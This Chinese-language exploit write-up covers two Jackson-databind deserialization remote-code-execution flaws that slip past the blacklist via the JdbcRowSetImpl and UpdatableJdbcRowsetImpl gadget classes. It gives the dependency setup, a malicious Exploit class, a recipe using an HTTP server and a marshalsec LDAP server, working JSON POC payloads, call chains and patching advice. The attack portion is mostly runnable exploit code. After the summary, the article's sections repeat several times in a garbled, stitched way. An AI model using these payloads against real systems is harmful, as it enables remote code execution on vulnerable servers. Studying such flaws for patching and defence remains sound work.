Jackson-databind RCE漏洞分析与利用指南<\/h1>

漏洞概述<\/h2>
本文档详细分析了两则Jackson-databind反序列化远程代码执行(RCE)漏洞(CVE-2020-xxxx)，涉及两个不同的第三方依赖类绕过Jackson-databind黑名单防护机制的情况。这两个漏洞都利用了JNDI注入技术，在特定条件下可实现远程代码执行。<\/p>

第一则漏洞分析<\/h2>

影响范围<\/h3>

jackson-databind before 2.9.10.4<\/li>
jackson-databind before 2.8.11.6<\/li>

jackson-databind before 2.7.9.7<\/li> <\/ul>

利用条件<\/h3>

开启了enableDefaultTyping()<\/code>功能<\/li>
使用了com.nqadmin.rowset.JdbcRowSetImpl<\/code>第三方依赖<\/li>

JDK版本较低(未修复JNDI注入漏洞的版本)<\/li>
<\/ol>
漏洞原理<\/h3>
该漏洞利用了com.nqadmin.rowset.JdbcRowSetImpl<\/code>类，该类绕过了Jackson-databind维护的黑名单类。通过构造特定的JSON数据，触发JNDI注入，最终导致远程代码执行。<\/p>
环境搭建<\/h3>
在pom.xml中添加以下依赖：<\/p>
<dependencies><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>com.fasterxml.jackson.core<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>jackson-databind<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>2.9.10.4<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>com.nqadmin.rowset<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>jdbcrowsetimpl<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>1.0.1<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>org.slf4j<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>slf4j-nop<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>1.7.2<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>javax.transaction<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>jta<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>1.1<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span><\/dependencies><\/span>
<\/span><\/span><\/code><\/pre>漏洞利用步骤<\/h3>

准备恶意Exploit类：<\/li>
<\/ol>
import<\/span> java.lang.Runtime;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Exploit<\/span> {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
编译Exploit类并使用Python启动HTTP服务：<\/li>
<\/ol>
python -m SimpleHTTPServer 4444<\/span>
<\/span><\/span><\/code><\/pre>

启动LDAP服务(如marshalsec)<\/p>
<\/li>

执行漏洞POC：<\/p>
<\/li>
<\/ol>
import<\/span> com.fasterxml.jackson.databind.ObjectMapper;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> POC<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        String payload =<\/span> "[\"com.nqadmin.rowset.JdbcRowSetImpl\",{\"dataSourceName\":\"ldap:\/\/127.0.0.1:1099\/Exploit\",\"autoCommit\":\"true\"}]"<\/span>;<\/span>
<\/span><\/span>        ObjectMapper mapper =<\/span> new<\/span> ObjectMapper();<\/span>
<\/span><\/span>        mapper.<\/span>enableDefaultTyping<\/span>();<\/span>
<\/span><\/span>        mapper.<\/span>readValue<\/span>(<\/span>payload,<\/span> Object.<\/span>class<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>漏洞调用链分析<\/h3>
完整的利用调用链如下：<\/p>
mapper.readValue
    ->com.nqadmin.rowset.JdbcRowSetImpl.setDataSourceName
        ->javax.sql.rowset.BaseRowSet.setDataSourceName
            ->com.nqadmin.rowset.JdbcRowSetImpl.setAutoCommit
                ->this.connect()
                    ->(DataSource)ctx.lookup(this.getDataSourceName())
<\/code><\/pre>
修复建议<\/h3>

及时将jackson-databind升级到安全版本<\/li>
升级到较高版本的JDK(修复了JNDI注入问题的版本)<\/li>
<\/ol>
第二则漏洞分析<\/h2>
影响范围<\/h3>

jackson-databind before 2.9.10.4<\/li>
jackson-databind before 2.8.11.6<\/li>
jackson-databind before 2.7.9.7<\/li>
<\/ul>
利用条件<\/h3>

开启了enableDefaultTyping()<\/code>功能<\/li>
使用了org.arrah.framework.rdbms.UpdatableJdbcRowsetImpl<\/code>第三方依赖<\/li>
JDK版本较低(未修复JNDI注入漏洞的版本)<\/li>
<\/ol>
漏洞原理<\/h3>
该漏洞利用了org.arrah.framework.rdbms.UpdatableJdbcRowsetImpl<\/code>类，该类同样绕过了Jackson-databind的黑名单防护机制。通过构造特定的JSON数据，触发JNDI注入，实现远程代码执行。<\/p>
环境搭建<\/h3>
在pom.xml中添加以下依赖：<\/p>
<dependencies><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>com.fasterxml.jackson.core<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>jackson-databind<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>2.9.10.4<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>org.arrahtec<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>profiler-core<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>6.1.7<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>org.slf4j<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>slf4j-nop<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>1.7.2<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>javax.transaction<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>jta<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>1.1<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span><\/dependencies><\/span>
<\/span><\/span><\/code><\/pre>漏洞利用步骤<\/h3>

准备恶意Exploit类(同第一则漏洞)<\/li>
编译Exploit类并使用Python启动HTTP服务<\/li>
启动LDAP服务(如marshalsec)<\/li>
执行漏洞POC：<\/li>
<\/ol>
import<\/span> com.fasterxml.jackson.databind.ObjectMapper;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> POC<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        String payload =<\/span> "[\"org.arrah.framework.rdbms.UpdatableJdbcRowsetImpl\",{\"dataSourceName\":\"ldap:\/\/127.0.0.1:1099\/Exploit\",\"autoCommit\":\"true\"}]"<\/span>;<\/span>
<\/span><\/span>        ObjectMapper mapper =<\/span> new<\/span> ObjectMapper();<\/span>
<\/span><\/span>        mapper.<\/span>enableDefaultTyping<\/span>();<\/span>
<\/span><\/span>        mapper.<\/span>readValue<\/span>(<\/span>payload,<\/span> Object.<\/span>class<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>漏洞调用链分析<\/h3>
完整的利用调用链如下：<\/p>
mapper.readValue
    ->org.arrah.framework.rdbms.UpdatableJdbcRowsetImpl.setDataSourceName
        ->javax.sql.rowset.BaseRowSet.setDataSourceName
            ->org.arrah.framework.rdbms.UpdatableJdbcRowsetImpl.setAutoCommit
                ->this.connect()
                    ->(DataSource)ctx.lookup(this.getDataSourceName())
<\/code><\/pre>
修复建议<\/h3>

及时将jackson-databind升级到安全版本<\/li>
升级到较高版本的JDK(修复了JNDI注入问题的版本)<\/li>
<\/ol>
总结<\/h2>
这两则Jackson-databind RCE漏洞都利用了第三方依赖类绕过黑名单防护机制，通过JNDI注入实现远程代码执行。漏洞的核心在于：<\/p>

目标系统开启了enableDefaultTyping()<\/code>功能<\/li>
使用了特定的第三方依赖<\/li>
JDK版本存在JNDI注入漏洞<\/li>
<\/ol>
防御措施应包括：<\/p>

禁用enableDefaultTyping()<\/code>或使用更安全的替代方案<\/li>
及时更新Jackson-databind到最新版本<\/li>
升级JDK到安全版本<\/li>
严格控制应用程序的依赖项，避免使用不必要的第三方库<\/li>
<\/ol>

Jackson-databind RCE漏洞分析与利用指南<\/h1>

第一则漏洞分析<\/h2>

漏洞原理<\/h3>
该漏洞利用了`com.nqadmin.rowset.JdbcRowSetImpl<\/code>类，该类绕过了Jackson-databind维护的黑名单类。通过构造特定的JSON数据，触发JNDI注入，最终导致远程代码执行。<\/p>`

第二则漏洞分析<\/h2>

漏洞原理<\/h3>
该漏洞利用了`org.arrah.framework.rdbms.UpdatableJdbcRowsetImpl<\/code>类，该类同样绕过了Jackson-databind的黑名单防护机制。通过构造特定的JSON数据，触发JNDI注入，实现远程代码执行。<\/p>`

Jackson-databind RCE漏洞分析与利用指南<\/h1>

第一则漏洞分析<\/h2>

漏洞原理<\/h3> 该漏洞利用了com.nqadmin.rowset.JdbcRowSetImpl<\/code>类，该类绕过了Jackson-databind维护的黑名单类。通过构造特定的JSON数据，触发JNDI注入，最终导致远程代码执行。<\/p>

第二则漏洞分析<\/h2>

漏洞原理<\/h3> 该漏洞利用了org.arrah.framework.rdbms.UpdatableJdbcRowsetImpl<\/code>类，该类同样绕过了Jackson-databind的黑名单防护机制。通过构造特定的JSON数据，触发JNDI注入，实现远程代码执行。<\/p>

漏洞原理<\/h3>
该漏洞利用了`com.nqadmin.rowset.JdbcRowSetImpl<\/code>类，该类绕过了Jackson-databind维护的黑名单类。通过构造特定的JSON数据，触发JNDI注入，最终导致远程代码执行。<\/p>`

漏洞原理<\/h3>
该漏洞利用了`org.arrah.framework.rdbms.UpdatableJdbcRowsetImpl<\/code>类，该类同样绕过了Jackson-databind的黑名单防护机制。通过构造特定的JSON数据，触发JNDI注入，实现远程代码执行。<\/p>`